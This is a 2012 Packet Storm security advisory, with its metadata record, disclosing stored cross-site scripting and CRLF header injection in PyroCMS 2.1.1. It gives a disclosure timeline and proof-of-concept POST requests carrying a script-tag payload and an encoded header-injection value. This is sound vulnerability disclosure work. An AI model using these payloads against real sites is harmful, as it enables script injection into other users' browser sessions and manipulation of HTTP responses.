PyroCMS 2.1.1 CRLF Injection / Stored Cross Site Scripting
2012-06-04T00:00:00
ID PACKETSTORM:113269 Type packetstorm Reporter LiquidWorm Modified 2012-06-04T00:00:00
Description
`
PyroCMS 2.1.1 CRLF Injection And Stored XSS Vulnerability
Vendor: HappyNinjas Ltd
Product web page: http://www.pyrocms.com
Affected version: 2.1.1 (Community)
Summary: PyroCMS is a CMS built using the CodeIgniter PHP framework.
Using an MVC architecture it was built with modularity in mind. Lightweight,
themeable and dynamic.
Desc: PyroCMS suffers from a stored XSS and HTTP Response Splitting
vulnerability when parsing user input to the 'title' and 'redirect_to'
parameters via POST method thru 'index.php' script. Attackers can exploit
these weaknesses to execute arbitrary HTML and script code in a user's
browser session or insert arbitrary HTTP headers, which are included in
a response sent to the user.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8
MySQL 5.5.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
[20.05.2012] Vulnerabilities discovered.
[20.05.2012] Initial contact with the vendor.
[20.05.2012] Vendor responds asking more details.
[20.05.2012] Sent detailed information to the vendor.
[21.05.2012] Vendor confirms the issues.
[22.05.2012] Asked vendor for status update.
[27.05.2012] Vendor replies.
[03.06.2012] Vendor releases version 2.1.2 to address these issues.
[04.06.2012] Coordinated public security advisory released.
Advisory ID: ZSL-2012-5092
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5092.php
Vendor Advisory: http://www.pyrocms.com/store/details/pyrocms_professional
20.05.2012
----
#1
- POST http://localhost/pyrocms/index.php/admin/blog/categories/create_ajax HTTP/1.1
csrf_hash_name 28b57b25dd24b3adb785de7fd863b6be
title "><script>alert(1);</script>
#2
- POST http://localhost/pyrocms/index.php/users/login HTTP/1.1
btnLogin Login
email lab@zeroscience.mk
password
redirect_to %0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
remember 1
#2a
- POST http://localhost/pyrocms/index.php/comments/create/pages/4 HTTP/1.1
comment t00t%20w00t!
d0ntf1llth1s1n
redirect_to %0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
submit Comment
`
{"hash": "3acd63523654fc059d6e5e832c1e411d82f7eac7f3b8f72fcd04bc6b3b1d37b9", "sourceHref": "https://packetstormsecurity.com/files/download/113269/ZSL-2012-5092.txt", "title": "PyroCMS 2.1.1 CRLF Injection / Stored Cross Site Scripting", "id": "PACKETSTORM:113269", "published": "2012-06-04T00:00:00", "description": "", "modified": "2012-06-04T00:00:00", "sourceData": "` \nPyroCMS 2.1.1 CRLF Injection And Stored XSS Vulnerability \n \n \nVendor: HappyNinjas Ltd \nProduct web page: http://www.pyrocms.com \nAffected version: 2.1.1 (Community) \n \nSummary: PyroCMS is a CMS built using the CodeIgniter PHP framework. \nUsing an MVC architecture it was built with modularity in mind. Lightweight, \nthemeable and dynamic. \n \nDesc: PyroCMS suffers from a stored XSS and HTTP Response Splitting \nvulnerability when parsing user input to the 'title' and 'redirect_to' \nparameters via POST method thru 'index.php' script. Attackers can exploit \nthese weaknesses to execute arbitrary HTML and script code in a user's \nbrowser session or insert arbitrary HTTP headers, which are included in \na response sent to the user. \n \nTested on: Microsoft Windows XP Professional SP3 (EN) \nApache 2.2.21 \nPHP 5.3.8 \nMySQL 5.5.20 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \nliquidworm gmail com \nZero Science Lab - http://www.zeroscience.mk \n \n \n[20.05.2012] Vulnerabilities discovered. \n[20.05.2012] Initial contact with the vendor. \n[20.05.2012] Vendor responds asking more details. \n[20.05.2012] Sent detailed information to the vendor. \n[21.05.2012] Vendor confirms the issues. \n[22.05.2012] Asked vendor for status update. \n[27.05.2012] Vendor replies. \n[03.06.2012] Vendor releases version 2.1.2 to address these issues. \n[04.06.2012] Coordinated public security advisory released. \n \n \nAdvisory ID: ZSL-2012-5092 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5092.php \n \nVendor Advisory: http://www.pyrocms.com/store/details/pyrocms_professional \n \n \n20.05.2012 \n \n \n---- \n \n \n#1 \n \n- POST http://localhost/pyrocms/index.php/admin/blog/categories/create_ajax HTTP/1.1 \n \ncsrf_hash_name 28b57b25dd24b3adb785de7fd863b6be \ntitle \"><script>alert(1);</script> \n \n \n#2 \n \n- POST http://localhost/pyrocms/index.php/users/login HTTP/1.1 \n \nbtnLogin Login \nemail lab@zeroscience.mk \npassword \nredirect_to %0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection \nremember 1 \n \n \n#2a \n \n- POST http://localhost/pyrocms/index.php/comments/create/pages/4 HTTP/1.1 \n \ncomment t00t%20w00t! \nd0ntf1llth1s1n \nredirect_to %0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection \nsubmit Comment \n`\n", "reporter": "LiquidWorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "a19b0acc95cfc6feaaac6663c0fe7862"}, {"key": "modified", "hash": "add67592bc0afcacc033da1c82327823"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "add67592bc0afcacc033da1c82327823"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "91aad38014ecd6c9585176f5bacd2246"}, {"key": "sourceData", "hash": "1e20fb88a38f5c78976016f260883e63"}, {"key": "sourceHref", "hash": "236c9e581aa671f20c195da68abb25da"}, {"key": "title", "hash": "d13bfe283aac98e74581ba22567605e0"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/113269/PyroCMS-2.1.1-CRLF-Injection-Stored-Cross-Site-Scripting.html", "lastseen": "2016-11-03T10:16:40", "viewCount": 0, "enchantments": {"vulnersScore": 4.9}}